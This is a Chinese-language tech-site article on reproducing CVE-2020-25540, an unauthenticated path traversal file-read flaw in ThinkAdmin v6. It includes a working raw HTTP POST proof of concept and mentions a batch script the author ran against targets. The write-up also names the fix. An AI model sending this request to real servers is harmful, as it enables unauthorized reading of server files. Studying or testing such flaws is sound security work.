溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行Thinkadmin v6任意文件讀取漏洞復現(xiàn)

發(fā)布時間:2021-12-28 17:46:41 來源:億速云 閱讀:477 作者:柒染 欄目:安全技術

本篇文章為大家展示了如何進行Thinkadmin v6任意文件讀取漏洞復現(xiàn),內(nèi)容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。

如何進行Thinkadmin v6任意文件讀取漏洞復現(xiàn)

Thinkadmin v6任意文件讀取漏洞(CVE-2020-25540)復現(xiàn)

一、漏洞簡介:

ThinkAdmin是一套基于ThinkPHP框架的通用后臺管理系統(tǒng),ThinkAdmin 的權限管理基于標準RBAC簡化而來,去除了繁雜的節(jié)點管理,使得權限管理起來更簡單,具體包含節(jié)點管理、權限管理、菜單管理、用戶管理。ThinkAdmin 6版本存在路徑遍歷漏洞。攻擊者可利用該漏洞通過GET請求編碼參數(shù)任意讀取遠程服務器上的文件。

二、漏洞成因:

https://github.com/zoujingli/ThinkAdmin/blob/v6/app/admin/controller/api/Update.php

Update.php中的函數(shù)方法未授權,可直接函數(shù)可直接調(diào)用。導致漏洞

三、影響范圍:

Thinkadmin版本小于 ≤ 2020.08.03.01

四、漏洞復現(xiàn):

POC:

POST/admin.html?s=admin/api.Update/nodeHTTP/1.1Host: 127.0.0.1Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 22rules=%5B%22.%2F%22%5D

簡單寫了一個批量的小腳本

如何進行Thinkadmin v6任意文件讀取漏洞復現(xiàn)

跑了一部分,成功的不多,HVV尾聲了,情況也正常。

如何進行Thinkadmin v6任意文件讀取漏洞復現(xiàn)

發(fā)現(xiàn)一個詭異的地方:burp直接放包不能成功回去json的返回數(shù)據(jù)

如何進行Thinkadmin v6任意文件讀取漏洞復現(xiàn)

python-嘗試python的request的post方法可以返回

如何進行Thinkadmin v6任意文件讀取漏洞復現(xiàn)

嘗試curl的post的方法可以正常返回數(shù)據(jù)

如何進行Thinkadmin v6任意文件讀取漏洞復現(xiàn)

下來再來研究這個問題。

五、修復方案:

目前廠商已經(jīng)發(fā)布修復相關問題,請受影響用戶盡快升級到安全版本

上述內(nèi)容就是如何進行Thinkadmin v6任意文件讀取漏洞復現(xiàn),你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業(yè)資訊頻道。

向AI問一下細節(jié)

免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權內(nèi)容。

AI